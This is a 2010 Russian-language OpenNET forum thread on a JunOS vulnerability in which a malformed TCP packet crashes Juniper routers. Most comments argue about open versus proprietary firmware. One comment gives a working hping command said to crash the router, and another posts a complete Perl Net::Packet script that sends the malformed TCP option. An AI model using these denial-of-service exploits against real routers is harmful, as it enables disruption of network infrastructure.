The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от opennews (??) on 08-Янв-10, 22:40 
Компания Juniper Networks объявила (http://praetorianprefect.com/archives/2010/01/junos-juniper-.../) об обнаружении уязвимости в ядре операционной системы JunOS, под которой работают большинство маршрутизаторов Juniper. Посылка специально сформированного TCP пакета (с неправильно оформленной заглавной частью) на открытый порт самого маршрутизатора вызывает крах ядра, ведущий за собой рестарт устройства. Встроенный межсетевой экран не в состоянии "поймать" и изолировать такой пакет.


Проблеме подвержены почти все версии JunOS, начиная с 5.3.5 p0-2 и заканчивая 9.0R1.1 (полныю список приводится здесь (http://www.securityfocus.com/bid/37670)). По словам Juniper Networks, проблема обнаружена самой компанией во время проверки на совместимость с оборудованием других производителей. Подробностей по поводу того каким образом должен быть сформирован пакет не сообщается. По неофициальным данным, обновление будет доступно в понедельник, 11 января.


URL: http://praetorianprefect.com/archives/2010/01/junos-juniper-.../
Новость: https://www.opennet.ru/opennews/art.shtml?num=24941

Высказать мнение | Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от Аноним (??) on 08-Янв-10, 22:40 
С учетом того, что в JunOS используется код FreeBSD, нет ли подобной дыры в других *BSD системах ?
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

2. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от Hety (??) on 08-Янв-10, 22:53 
Фряшный код используется не во всех подсистемах. Деталей не помню, но есть вероятность, что сетевая как раз своя. Или, как минимум, была обработана напильником.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

3. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от chemtech email on 09-Янв-10, 10:54 
Была бы свободная прошивка, накатил патч, а тут ждать когда они обновят прошивку и не факт что еще все дыры залатали...
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

5. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от Lindemidux (??) on 09-Янв-10, 15:52 
У d-link свободная прошивка, попробуй накатай патч.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

6. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  –2 +/
Сообщение от User294 (ok) on 09-Янв-10, 16:40 
>У d-link свободная прошивка, попробуй накатай патч.

У меня именно таким манером в свое время был Д-линк ... с прошивкой от сторонних авторов (McMcc). Да и на ряд длинков с эзернетом нынче подходят прошивки "от Олега". Кстати вполне обычна ситуация когда дыры и назойливые баги (вплоть до ляпов не позволяющих юзать девайс в нужной конфигурации вообще, как это бывало с типовой для России связкой DHCP+PPTP например) в сторонних прошивках фиксятся шибко быстрее чем раздуплятся вендоры. И это большой плюс опенсорсных прошивок. Можно сосать месяцами, менять два десятка девайсов, прыгать с бубном и прочая. А можно влить фирмваре от местных спецов, которые в вопросе разбираются и в курсе "национальных особенностей" и через 10 минут все будет работать. Лучше чем оригинал, как правило. Ну да, бздунам с их всеобщим счастьем для закрывателей сорсов такое ессно не светит. Пусть наслаждаются своими блобами и тотальной зависимостью от вендора с невозможностью без большого траха исправить самолично жалкие пару байтов чтобы исправить какую-то вот такую вот хрень.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

10. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  –2 +/
Сообщение от arachnid (??) on 09-Янв-10, 22:13 
осподи, опять крышу снесло от букв bsd?

ps. а что делать, если не будет очередного Олега, а юзер? ты сам готов прошивку писать?
а то вот например сейчас очень популяы насы на линухе, а вот прошивок для них как-то тухло. чего бы не приложиться?

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

11. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от vitek (??) on 10-Янв-10, 00:37 
а его уже как полтора года нет.
нашлись другие - http://code.google.com/p/wl500g/
проблем то. там то его собрать, что бзишнегу мир.
>а то вот например сейчас очень популяы насы на линухе, а вот прошивок для них как-то тухло. чего бы не приложиться?

давай насу. приложусь.

зы:
крышу то держи. а то с выдувает всё то из под неё то.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

13. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от arachnid (ok) on 10-Янв-10, 15:54 
>а его уже как полтора года нет.
>нашлись другие - http://code.google.com/p/wl500g/
>проблем то. там то его собрать, что бзишнегу мир.
>>а то вот например сейчас очень популяы насы на линухе, а вот прошивок для них как-то тухло. чего бы не приложиться?
>
>давай насу. приложусь.
>
>зы:
>крышу то держи. а то с выдувает всё то из под неё
>то.

идешь на сайт интела и берешь прошивку. все просто. правда энтузиастам пока почему то не удалось сделать свою.

http://www.intel.com/support/ru/motherboards/server/ss4000-e/ - вот оно. как то пока "Олега" на это устройство не наблюдается.

а что касаемо крыши - так я же не бегаю по топикам, где светятся буквы gpl и не поливаю говном ее использующих.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

16. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от User294 (ok) on 10-Янв-10, 20:55 
А в чем было поливание говном? Я констатировал факт что при наличии сорсов тупые баги зачастую чинятся локально куда быстрее чем пока там снимется с тормоза вендор. Это теперь уже считается за поливание говном? Да вы совсем уж с дуба рухнули с вашим фанатизмом. Ну да, конечно, орать про свободу на форуме - это одно, а починить тупой баг в фирмваре по быстренькому - другое. Как по мне - предпочитаю фактическую свободу вместо громких деклараций о всеобщем счастье.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

29. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от boykov (ok) on 18-Янв-10, 17:57 
>
>идешь на сайт интела и берешь прошивку. все просто. правда энтузиастам пока
>почему то не удалось сделать свою.
>
>http://www.intel.com/support/ru/motherboards/server/ss4000-e/ - вот оно. как то пока "Олега" на это устройство не
>наблюдается.
>

а оно надо этому девайсу?
с вайфаем -- была острая необходимость. здесь то что?

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

32. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от arachnid (ok) on 19-Янв-10, 08:19 
>>
>>идешь на сайт интела и берешь прошивку. все просто. правда энтузиастам пока
>>почему то не удалось сделать свою.
>>
>>http://www.intel.com/support/ru/motherboards/server/ss4000-e/ - вот оно. как то пока "Олега" на это устройство не
>>наблюдается.
>>
>
>а оно надо этому девайсу?
>с вайфаем -- была острая необходимость. здесь то что?

а здесь - потрясающе низкая скорость работы сетевого накопителя.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

14. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от User294 (ok) on 10-Янв-10, 20:42 
> ps. а что делать, если не будет очередного Олега, а юзер? ты сам готов прошивку писать?

Я осваиваю OpenWRT и связанные с ним околосистемные дела. Весьма осмысленная такая штука - как раз для создания на его основе своих прошивок под свои вкусы и цели. Мне нравится. И с нуля ничего писать не надо, в общем то. Велосипедостроение - удел проприетарщиков и жлобов. Базовых платформ - не так уж и много и какая-никакая поддержка оных уже вколупана. Да, ессно мне до высот как у матерых системщиков пока далековато. Но в конце концов не боги горшки обжигают. Предпочитаю учиться что-то делать сам чем подлизывать "божкам" из [тут проприетарная контора по вкусу] в надежде на их милость. Попробовав и так и сяк пришел к выводу что так мне нравится больше.

> а вот прошивок для них как-то тухло. чего бы не приложиться?

Ну, кому интересно это направлене - в своем праве поприкладываться. Я пока подсел на OpenWRT, а это все-таки не NAS. Да и где-то на уровне интуиции понятно что NAS как класс soho девайсов вероятно умрет - ИМХО интеграция в SOHO вскоре вгонит все в 1 универсальный девайс вида "роутер + wi-fi + HDD". Как в свое время умерли КПК в пользу более интегренных коммуникаторов. Если Marvell запозиционирует свои процы как платформу для роутерообразных штук и у меня будет такая железяка - я с удовольствием с ней покопаютсь. А в данный момент мне и так есть где приложиться.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

18. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от arachnid (ok) on 10-Янв-10, 21:52 
"Ну да, бздунам с их всеобщим счастьем для закрывателей сорсов такое ессно не светит" - то есть это взвешенный и аргументированный коммент?

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

19. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от User294 (ok) on 10-Янв-10, 22:28 
Да, кой-в чем вы правы: надо стараться избегать таких оборотов провоцирующих на колкости в ответ. Однако со своей стороны замечу что меня интересуют технические моменты а не кидание какашками и выяснение какие козлы собеседники. И вот в этом плане я что-то внятных контр-аргументов не вижу.Зато рассказать мне какой я козел - это всегда пожалуйста.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

20. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от arachnid (ok) on 10-Янв-10, 23:30 
>Да, кой-в чем вы правы: надо стараться избегать таких оборотов провоцирующих на
>колкости в ответ. Однако со своей стороны замечу что меня интересуют
>технические моменты а не кидание какашками и выяснение какие козлы собеседники.
>И вот в этом плане я что-то внятных контр-аргументов не вижу.Зато
>рассказать мне какой я козел - это всегда пожалуйста.

ну я бы сказал, что подобная реакция заслуженна определенным поведением, разве нет?

опять же - никакая лицензия не заставит выпустить производителя выпускать обновления быстро. то есть в данном случае я не вижу связи между сообществом freeBSD и выпуском джунипером обновлений. так же, например, как между длинком, выпускающем soho-роутеры на линухе, и боте-нете на оных и собственно самим линухом.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

30. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от User294 (ok) on 18-Янв-10, 18:30 
>ну я бы сказал, что подобная реакция заслуженна определенным поведением, разве нет?

Как

>опять же - никакая лицензия не заставит выпустить производителя
>выпускать обновления быстро.

Да, вот только для длинков и асусов всяких, с их GPL - желающие сами могут запатчить большинство ляпов. Посему те кто не хочет быть рассадником ботов, глюков, багв и делать вендору годами минет в надежде что все это может быть починят (а может быть и нет, какие гарантии то?) - получают шанс потрепыхаться сами. И я не понимаю какого хрена у них за их бабки этого шанса быть не должно.

>то есть в данном случае я не вижу связи между сообществом
>freeBSD и выпуском джунипером обновлений.

Именно. Между сообществом и вендором связи никакой. И на самом деле это - dead way. Коллаборативная работа над проблемой - заруливает растаскивание по углам с большим отрывом.

>так же, например, как между длинком, выпускающем soho-роутеры на линухе,
>и боте-нете на оных и собственно самим линухом.

В случае линуха - если мне влом быть куском ботнета, я могу накрайняк переколупать фирмваре сам, возможно с целой групкой тех кто считает так же. Откусив или починив проблемный функционал. И даже могу раздать фирмваре другим. Мне это как-то более симпатично в таком виде, если что.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

33. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от arachnid (ok) on 19-Янв-10, 08:38 
>>ну я бы сказал, что подобная реакция заслуженна определенным поведением, разве нет?
>
>Как
>

как заслуженна? еще раз отрывок из коммента выше напомнить? :)

>>опять же - никакая лицензия не заставит выпустить производителя
>>выпускать обновления быстро.
>
>Да, вот только для длинков и асусов всяких, с их GPL -
>желающие сами могут запатчить большинство ляпов. Посему те кто не хочет
>быть рассадником ботов, глюков, багв и делать вендору годами минет в
>надежде что все это может быть починят (а может быть и
>нет, какие гарантии то?) - получают шанс потрепыхаться сами. И я
>не понимаю какого хрена у них за их бабки этого шанса
>быть не должно.

то устройство, на которое я ссылался, тоже на линухе с gpl. и?

>>то есть в данном случае я не вижу связи между сообществом
>>freeBSD и выпуском джунипером обновлений.
>
>Именно. Между сообществом и вендором связи никакой. И на самом деле это
>- dead way. Коллаборативная работа над проблемой - заруливает растаскивание по
>углам с большим отрывом.

ну во первых, неизвестно, проблема это самой фри или доработок напильником джунипера. это раз. второе - в случае сильной доработки напильником и невозвращения изменений производитель рискует остаться на бобах - с каждым изменением ему приходиться пилить заново. знаю парочку таких контор - одни на линухе, другие на фре - обе используют версии 10летней давности.

>
>>так же, например, как между длинком, выпускающем soho-роутеры на линухе,
>>и боте-нете на оных и собственно самим линухом.
>
>В случае линуха - если мне влом быть куском ботнета, я могу
>накрайняк переколупать фирмваре сам, возможно с целой групкой тех кто считает
>так же. Откусив или починив проблемный функционал. И даже могу раздать
>фирмваре другим. Мне это как-то более симпатично в таком виде, если
>что.

я не про это. да, мне тоже больше нравиться открытость и возможность настроить железку так, как надо мне, а не стандартному пользователю. но это уже не в контексте обсуждаемой проблемы.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

22. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от Юрий (??) on 11-Янв-10, 05:22 
>Если Marvell запозиционирует
>свои процы как платформу для роутерообразных штук и у меня будет
>такая железяка - я с удовольствием с ней покопаютсь. А в
>данный момент мне и так есть где приложиться.

Так покопайтесь с Time Capsule - внутри 100% Marvell


Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

31. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от User294 (ok) on 18-Янв-10, 18:42 
>Так покопайтесь с Time Capsule - внутри 100% Marvell

Это чего-то яббловское как я понял? От продукции яббла я предпочитаю держаться подальше, слишком уж противный и ограничительный вендор, даже хуже MS имхо, т.к. задранные цены + в их железках всегда найдется какая-то пакость которая отравит удовольствие от обладания девайсом. Да и если у вас нет мака (а мне и без него хорошо) - яббловские железки обычно не слишком ориентированы на всех остальных. Вот если несколько более-менее нейтральных вендоров начнут юзать платформу для роутеров, я к ней присмотрюсь, факт.

P.S. а вообще, честное пионерское, мне есть с чем поковыряться в свое удовольствие и я в состоянии выбрать себе предметы ковыряния сам. Без всяких ябблов на горизонте.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

28. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +1 +/
Сообщение от анон on 15-Янв-10, 08:29 
йо. ваше маниакальное стремление пересадить всех на опенсорц напоминает РМС. хотите использовать в ядре сети железку с прошивкой "от олега" - ваше дурное право. но пропагандировать свою дурь это уж через чур. да, кстати. сетевые железки - большой бизнес. а в бизнесе не будет ничего открытого, ибо конкуренция и коммерческая тайна.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

8. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от Ъ on 09-Янв-10, 19:58 
>У d-link свободная прошивка

В каком месте? ftp://dlink.ru/pub/  как-то не на что не наблюдается.
  

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

15. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от User294 (ok) on 10-Янв-10, 20:45 
А в ftp://dlink.ru/pub/ADSL/GPL_source_code/ интересно чего? :)
А так - да, некоторые типа длинка довольно раздолбайски относятся к выкладыванию сорсов. Потому то и есть всякие GPLviolations.org :)
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

4. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +2 +/
Сообщение от cvsup (ok) on 09-Янв-10, 13:56 
Видео:
http://praetorianprefect.com/archives/2010/01/junos-juniper-.../
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

7. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от аноним on 09-Янв-10, 19:02 
да. Ынтерпрайз баги, классика... классика, конечно, пинг смерти, но и это сойдёт
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

9. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от XoRe (ok) on 09-Янв-10, 21:53 
>Подробностей по поводу того каким образом должен быть сформирован пакет
>не сообщается.

Можно попробовать подойти к вопросу с точки зрения комбинаторики.
Нагенерить 2 в степени n пакетов и поотсылать их устройству.
На каком пакете упадет, тот левый)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

17. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от User294 (ok) on 10-Янв-10, 21:03 
А чему равно n? А то скажем 2^128 пакетоы вы обломитесь послать пожалуй :)
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

12. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от vgray email(??) on 10-Янв-10, 10:38 
посмотрел видео, попробовал. там в описании ошибка небольшая. но все работает
hping -c 1 -p 23 -L 0 -M 0 192.168.10.210 -S -E ./jun/1012 -d 10 -O 7
убивает 9й джун наповал.


                      

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

21. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от Аноним (??) on 11-Янв-10, 04:23 
А можно содержимое файлика /jun/1012. Всё равно 23-й порт закрыт от обычных пользователей.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

23. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от vgray email(??) on 11-Янв-10, 05:34 
>А можно содержимое файлика /jun/1012. Всё равно 23-й порт закрыт от обычных
>пользователей.

увы не скажу, так как даже если порт закрыт ACL то все равно джунипер валится. Попробуйте почитать исходную новость и попробовать самим подобрать содержимое файла

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

24. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от Аноним (??) on 11-Янв-10, 07:11 
Ясно. Тогда я не оценил масштабов трагедии.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

25. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +/
Сообщение от Аноним (??) on 11-Янв-10, 08:55 
Если не сложно можно связаться с Вами для уточнения содержимого пакета, так как подбор не помог и Жунипер не отреагировал, встает вопрос версия не восприимчива или просто не правильно сформирован пакет?
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

27. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."  +1 +/
Сообщение от luzers on 11-Янв-10, 14:27 
#!/usr/bin/perl

my $host = shift;
my $port = shift;

use Net::Packet qw($Env);

use Net::Packet::IPv4;
my $ip = Net::Packet::IPv4->new(dst => $host);

use Net::Packet::TCP;

my $tcp = Net::Packet::TCP->new(
dst => $port,
options => "\x65\x02\x01\x01",
);

use Net::Packet::Frame;
my $frame = Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);

$frame->send;
exit 0;

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Спонсоры:
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2022 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру